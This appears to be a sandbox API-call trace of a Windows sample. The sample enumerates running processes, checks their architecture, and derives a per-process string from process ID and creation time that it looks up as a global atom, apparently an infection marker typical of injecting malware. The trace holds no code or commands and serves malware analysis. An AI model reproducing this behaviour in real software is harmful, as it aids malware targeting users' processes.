	[0128.315] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="inserted_field.exe", cchWideChar=18, lpMultiByteStr=0x399d188, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="inserted_field.exe", lpUsedDefaultChar=0x0) returned 18
	[0128.315] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x2dc
	[0128.315] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.315] CloseHandle (hObject=0x2dc) returned 1
	[0128.315] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="semi bay.exe", cchWideChar=12, lpMultiByteStr=0x39b5b80, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="semi bay.exe", lpUsedDefaultChar=0x0) returned 12
	[0128.316] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x2dc
	[0128.316] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.316] CloseHandle (hObject=0x2dc) returned 1
	[0128.316] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="outdoor.exe", cchWideChar=11, lpMultiByteStr=0x39b59e8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="outdoor.exe", lpUsedDefaultChar=0x0) returned 11
	[0128.316] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x2dc
	[0128.316] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.316] CloseHandle (hObject=0x2dc) returned 1
	[0128.316] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="wool-parish-horses.exe", cchWideChar=22, lpMultiByteStr=0x399d128, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="wool-parish-horses.exe", lpUsedDefaultChar=0x0) returned 22
	[0128.316] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x2dc
	[0128.316] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.317] CloseHandle (hObject=0x2dc) returned 1
	[0128.317] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spoken-delayed.exe", cchWideChar=18, lpMultiByteStr=0x399d128, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spoken-delayed.exe", lpUsedDefaultChar=0x0) returned 18
	[0128.317] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x2dc
	[0128.317] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.317] CloseHandle (hObject=0x2dc) returned 1
	[0128.317] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spokesman.exe", cchWideChar=13, lpMultiByteStr=0x39b5b80, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spokesman.exe", lpUsedDefaultChar=0x0) returned 13
	[0128.317] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x2dc
	[0128.317] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.317] CloseHandle (hObject=0x2dc) returned 1
	[0128.318] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="oxide.exe", cchWideChar=9, lpMultiByteStr=0x39b5b80, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="oxide.exe", lpUsedDefaultChar=0x0) returned 9
	[0128.318] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x2dc
	[0128.318] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.318] CloseHandle (hObject=0x2dc) returned 1
	[0128.318] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="off-covered-playlist.exe", cchWideChar=24, lpMultiByteStr=0x39b9938, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="off-covered-playlist.exe", lpUsedDefaultChar=0x0) returned 24
	[0128.318] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x2dc
	[0128.318] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.318] CloseHandle (hObject=0x2dc) returned 1
	[0128.318] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="bryant.exe", cchWideChar=10, lpMultiByteStr=0x39b5b50, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bryant.exe", lpUsedDefaultChar=0x0) returned 10
	[0128.319] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x2dc
	[0128.319] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.319] CloseHandle (hObject=0x2dc) returned 1
	[0128.319] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="postal-fool.exe", cchWideChar=15, lpMultiByteStr=0x39b5a78, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="postal-fool.exe", lpUsedDefaultChar=0x0) returned 15
	[0128.319] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x2dc
	[0128.319] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.319] CloseHandle (hObject=0x2dc) returned 1
	[0128.319] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="crm_remarks_ctrl.exe", cchWideChar=20, lpMultiByteStr=0x399d128, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="crm_remarks_ctrl.exe", lpUsedDefaultChar=0x0) returned 20
	[0128.320] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x2dc
	[0128.320] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.320] CloseHandle (hObject=0x2dc) returned 1
	[0128.320] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="volunteer.exe", cchWideChar=13, lpMultiByteStr=0x39b5b08, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="volunteer.exe", lpUsedDefaultChar=0x0) returned 13
	[0128.320] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x2dc
	[0128.320] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.320] CloseHandle (hObject=0x2dc) returned 1
	[0128.320] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ranger_tu_community.exe", cchWideChar=23, lpMultiByteStr=0x399d128, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ranger_tu_community.exe", lpUsedDefaultChar=0x0) returned 23
	[0128.320] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x2dc
	[0128.320] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.320] CloseHandle (hObject=0x2dc) returned 1
	[0128.321] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="eddie_cholesterol_reprint.exe", cchWideChar=29, lpMultiByteStr=0x39b97a8, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="eddie_cholesterol_reprint.exe", lpUsedDefaultChar=0x0) returned 29
	[0128.321] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x2dc
	[0128.321] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.321] CloseHandle (hObject=0x2dc) returned 1
	[0128.321] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="bracket-natural-chancellor.exe", cchWideChar=30, lpMultiByteStr=0x39b9af0, cbMultiByte=31, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bracket-natural-chancellor.exe", lpUsedDefaultChar=0x0) returned 30
	[0128.321] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x2dc
	[0128.321] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.321] CloseHandle (hObject=0x2dc) returned 1
	[0128.322] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="safari.exe", cchWideChar=10, lpMultiByteStr=0x39b5a48, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="safari.exe", lpUsedDefaultChar=0x0) returned 10
	[0128.322] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x2dc
	[0128.322] GetLastError () returned 0x5
	[0128.322] GetLastError () returned 0x5
	[0128.322] GetLastError () returned 0x5
	[0128.322] GetLastError () returned 0x5
	[0128.322] GetLastError () returned 0x5
	[0128.322] GetLastError () returned 0x5
	[0128.322] GetLastError () returned 0x5
	[0128.322] GetLastError () returned 0x5
	[0128.322] GetLastError () returned 0x5
	[0128.322] GetLastError () returned 0x5
	[0128.322] GetLastError () returned 0x5
	[0128.322] GetLastError () returned 0x5
	[0128.322] GetLastError () returned 0x5
	[0128.322] GetLastError () returned 0x5
	[0128.322] GetLastError () returned 0x5
	[0128.322] GetLastError () returned 0x5
	[0128.322] GetLastError () returned 0x5
	[0128.322] GetLastError () returned 0x5
	[0128.322] GetLastError () returned 0x5
	[0128.322] GetLastError () returned 0x5
	[0128.322] GetLastError () returned 0x5
	[0128.322] GetLastError () returned 0x5
	[0128.322] GetLastError () returned 0x5
	[0128.322] GetLastError () returned 0x5
	[0128.322] GetLastError () returned 0x5
	[0128.322] GetLastError () returned 0x5
	[0128.322] GetLastError () returned 0x5
	[0128.322] GetLastError () returned 0x5
	[0128.322] GetLastError () returned 0x5
	[0128.322] GetLastError () returned 0x5
	[0128.322] GetLastError () returned 0x5
	[0128.322] GetLastError () returned 0x5
	[0128.323] GetLastError () returned 0x5
	[0128.323] GetLastError () returned 0x5
	[0128.323] GetLastError () returned 0x5
	[0128.323] GetLastError () returned 0x5
	[0128.323] GetLastError () returned 0x5
	[0128.323] GetLastError () returned 0x5
	[0128.323] GetLastError () returned 0x5
	[0128.323] GetLastError () returned 0x5
	[0128.323] GetLastError () returned 0x5
	[0128.323] GetLastError () returned 0x5
	[0128.323] GetLastError () returned 0x5
	[0128.323] GetLastError () returned 0x5
	[0128.323] GetLastError () returned 0x5
	[0128.323] GetLastError () returned 0x5
	[0128.323] GetLastError () returned 0x5
	[0128.323] GetLastError () returned 0x5
	[0128.323] GetLastError () returned 0x5
	[0128.323] GetLastError () returned 0x5
	[0128.323] GetLastError () returned 0x5
	[0128.323] GetLastError () returned 0x5
	[0128.323] GetLastError () returned 0x5
	[0128.323] GetLastError () returned 0x5
	[0128.323] GetLastError () returned 0x5
	[0128.323] GetLastError () returned 0x5
	[0128.323] GetLastError () returned 0x5
	[0128.323] GetLastError () returned 0x5
	[0128.323] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0128.324] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0128.324] GetProcessTimes (in: hProcess=0x2dc, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0128.324] GetLastError () returned 0x5
	[0128.324] GetLastError () returned 0x5
	[0128.324] GetLastError () returned 0x5
	[0128.324] GetLastError () returned 0x5
	[0128.324] GetLastError () returned 0x5
	[0128.324] GetLastError () returned 0x5
	[0128.324] GetLastError () returned 0x5
	[0128.324] GetLastError () returned 0x5
	[0128.324] GetLastError () returned 0x5
	[0128.324] GetLastError () returned 0x5
	[0128.324] GetLastError () returned 0x5
	[0128.324] GetLastError () returned 0x5
	[0128.324] GetLastError () returned 0x5
	[0128.324] GetLastError () returned 0x5
	[0128.324] GetLastError () returned 0x5
	[0128.324] GetLastError () returned 0x5
	[0128.324] GetLastError () returned 0x5
	[0128.324] GetLastError () returned 0x5
	[0128.324] GetLastError () returned 0x5
	[0128.324] GetLastError () returned 0x5
	[0128.324] GetLastError () returned 0x5
	[0128.324] GetLastError () returned 0x5
	[0128.324] GetLastError () returned 0x5
	[0128.324] GetLastError () returned 0x5
	[0128.324] GetLastError () returned 0x5
	[0128.324] GetLastError () returned 0x5
	[0128.324] wsprintfA (in: param_1=0x39938f8, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0128.324] GetLastError () returned 0x5
	[0128.324] GetLastError () returned 0x5
	[0128.324] GetLastError () returned 0x5
	[0128.324] GetLastError () returned 0x5
	[0128.324] GetLastError () returned 0x5
	[0128.324] GetLastError () returned 0x5
	[0128.324] GetLastError () returned 0x5
	[0128.324] GetLastError () returned 0x5
	[0128.325] GetLastError () returned 0x5
	[0128.325] GetLastError () returned 0x5
	[0128.325] GetLastError () returned 0x5
	[0128.325] GetLastError () returned 0x5
	[0128.325] GetLastError () returned 0x5
	[0128.325] GetLastError () returned 0x5
	[0128.325] GetLastError () returned 0x5
	[0128.325] GetLastError () returned 0x5
	[0128.325] GetLastError () returned 0x5
	[0128.325] GetLastError () returned 0x5
	[0128.325] GetLastError () returned 0x5
	[0128.325] GetLastError () returned 0x5
	[0128.325] GetLastError () returned 0x5
	[0128.325] GetLastError () returned 0x5
	[0128.325] GetLastError () returned 0x5
	[0128.325] GetLastError () returned 0x5
	[0128.325] GetLastError () returned 0x5
	[0128.325] GetLastError () returned 0x5
	[0128.325] GetLastError () returned 0x5
	[0128.325] GetLastError () returned 0x5
	[0128.325] GetLastError () returned 0x5
	[0128.325] GetLastError () returned 0x5
	[0128.325] GetLastError () returned 0x5
	[0128.325] GetLastError () returned 0x5
	[0128.325] GetLastError () returned 0x5
	[0128.325] GetLastError () returned 0x5
	[0128.325] GetLastError () returned 0x5
	[0128.325] GetLastError () returned 0x5
	[0128.325] GetLastError () returned 0x5
	[0128.325] GetLastError () returned 0x5
	[0128.325] GetLastError () returned 0x5
	[0128.325] GetLastError () returned 0x5
	[0128.325] GetLastError () returned 0x5
	[0128.325] GetLastError () returned 0x5
	[0128.325] GetLastError () returned 0x5
	[0128.325] GetLastError () returned 0x5
	[0128.325] GetLastError () returned 0x5
	[0128.325] GetLastError () returned 0x5
	[0128.325] GetLastError () returned 0x5
	[0128.325] GetLastError () returned 0x5
	[0128.325] GetLastError () returned 0x5
	[0128.325] GetLastError () returned 0x5
	[0128.325] GetLastError () returned 0x5
	[0128.326] GetLastError () returned 0x5
	[0128.326] GetLastError () returned 0x5
	[0128.326] GetLastError () returned 0x5
	[0128.326] GetLastError () returned 0x5
	[0128.326] GetLastError () returned 0x5
	[0128.326] GetLastError () returned 0x5
	[0128.326] GetLastError () returned 0x5
	[0128.326] GetLastError () returned 0x5
	[0128.326] GetLastError () returned 0x5
	[0128.326] GetLastError () returned 0x5
	[0128.326] GetLastError () returned 0x5
	[0128.326] GetLastError () returned 0x5
	[0128.326] GetLastError () returned 0x5
	[0128.326] GetLastError () returned 0x5
	[0128.326] GetLastError () returned 0x5
	[0128.326] GetLastError () returned 0x5
	[0128.326] GetLastError () returned 0x5
	[0128.326] GetLastError () returned 0x5
	[0128.326] GetLastError () returned 0x5
	[0128.326] GetLastError () returned 0x5
	[0128.326] GetLastError () returned 0x5
	[0128.326] GetLastError () returned 0x5
	[0128.326] GetLastError () returned 0x5
	[0128.326] GetLastError () returned 0x5
	[0128.326] GetLastError () returned 0x5
	[0128.326] GetLastError () returned 0x5
	[0128.326] GetLastError () returned 0x5
	[0128.326] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0128.326] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0128.326] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0128.327] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0128.327] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0128.327] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0128.327] CloseHandle (hObject=0x2dc) returned 1
	[0128.327] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0128.327] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="sppsvc.exe", cchWideChar=10, lpMultiByteStr=0x39b59e8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sppsvc.exe", lpUsedDefaultChar=0x0) returned 10
	[0128.327] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x30c) returned 0x2dc
	[0128.327] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.327] CloseHandle (hObject=0x2dc) returned 1
	[0128.328] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="cmd.exe", cchWideChar=7, lpMultiByteStr=0x69d5d8, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="cmd.exe", lpUsedDefaultChar=0x0) returned 7
	[0128.328] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdd4) returned 0x2dc
	[0128.328] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.328] CloseHandle (hObject=0x2dc) returned 1
	[0128.328] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SMSvcHost32.exe", cchWideChar=15, lpMultiByteStr=0x39b5970, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SMSvcHost32.exe", lpUsedDefaultChar=0x0) returned 15
	[0128.328] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd50) returned 0x2dc
	[0128.328] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.328] CloseHandle (hObject=0x2dc) returned 1
	[0128.328] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="conhost.exe", cchWideChar=11, lpMultiByteStr=0x39b5c10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="conhost.exe", lpUsedDefaultChar=0x0) returned 11
	[0128.329] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdb0) returned 0x2dc
	[0128.329] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.329] CloseHandle (hObject=0x2dc) returned 1
	[0128.329] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PING.EXE", cchWideChar=8, lpMultiByteStr=0x39b5a78, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PING.EXE", lpUsedDefaultChar=0x0) returned 8
	[0128.329] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2e4) returned 0x2dc
	[0128.329] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.329] CloseHandle (hObject=0x2dc) returned 1
	[0128.329] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="backgroundTaskHost.exe", cchWideChar=22, lpMultiByteStr=0x399d128, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="backgroundTaskHost.exe", lpUsedDefaultChar=0x0) returned 22
	[0128.366] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="smss.exe", cchWideChar=8, lpMultiByteStr=0x39b5c10, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="smss.exe", lpUsedDefaultChar=0x0) returned 8
	[0128.366] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="csrss.exe", cchWideChar=9, lpMultiByteStr=0x39b59e8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="csrss.exe", lpUsedDefaultChar=0x0) returned 9
	[0128.366] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="wininit.exe", cchWideChar=11, lpMultiByteStr=0x39b5970, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="wininit.exe", lpUsedDefaultChar=0x0) returned 11
	[0128.366] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="csrss.exe", cchWideChar=9, lpMultiByteStr=0x39b59e8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="csrss.exe", lpUsedDefaultChar=0x0) returned 9
	[0128.367] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="winlogon.exe", cchWideChar=12, lpMultiByteStr=0x39b5b38, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="winlogon.exe", lpUsedDefaultChar=0x0) returned 12
	[0128.367] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="services.exe", cchWideChar=12, lpMultiByteStr=0x39b5b80, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="services.exe", lpUsedDefaultChar=0x0) returned 12
	[0128.367] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="lsass.exe", cchWideChar=9, lpMultiByteStr=0x39b5b08, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="lsass.exe", lpUsedDefaultChar=0x0) returned 9
	[0128.367] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5b80, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0128.367] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5b08, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0128.367] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="dwm.exe", cchWideChar=7, lpMultiByteStr=0x69d578, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dwm.exe", lpUsedDefaultChar=0x0) returned 7
	[0128.368] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5a48, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0128.368] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5b08, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0128.368] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5a78, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0128.368] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5a78, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0128.368] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5970, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0128.369] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5c10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0128.369] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5970, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0128.369] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spoolsv.exe", cchWideChar=11, lpMultiByteStr=0x39b5b08, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spoolsv.exe", lpUsedDefaultChar=0x0) returned 11
	[0128.369] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.369] CloseHandle (hObject=0x2dc) returned 1
	[0128.369] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="sihost.exe", cchWideChar=10, lpMultiByteStr=0x39b5970, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sihost.exe", lpUsedDefaultChar=0x0) returned 10
	[0128.370] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5c10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0128.370] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="OfficeClickToRun.exe", cchWideChar=20, lpMultiByteStr=0x399d128, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OfficeClickToRun.exe", lpUsedDefaultChar=0x0) returned 20
	[0128.370] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.370] CloseHandle (hObject=0x2dc) returned 1
	[0128.370] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="RuntimeBroker.exe", cchWideChar=17, lpMultiByteStr=0x399d128, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RuntimeBroker.exe", lpUsedDefaultChar=0x0) returned 17
	[0128.370] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5970, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0128.370] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.371] CloseHandle (hObject=0x2dc) returned 1
	[0128.371] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="taskhostw.exe", cchWideChar=13, lpMultiByteStr=0x39b5970, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="taskhostw.exe", lpUsedDefaultChar=0x0) returned 13
	[0128.371] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.371] CloseHandle (hObject=0x2dc) returned 1
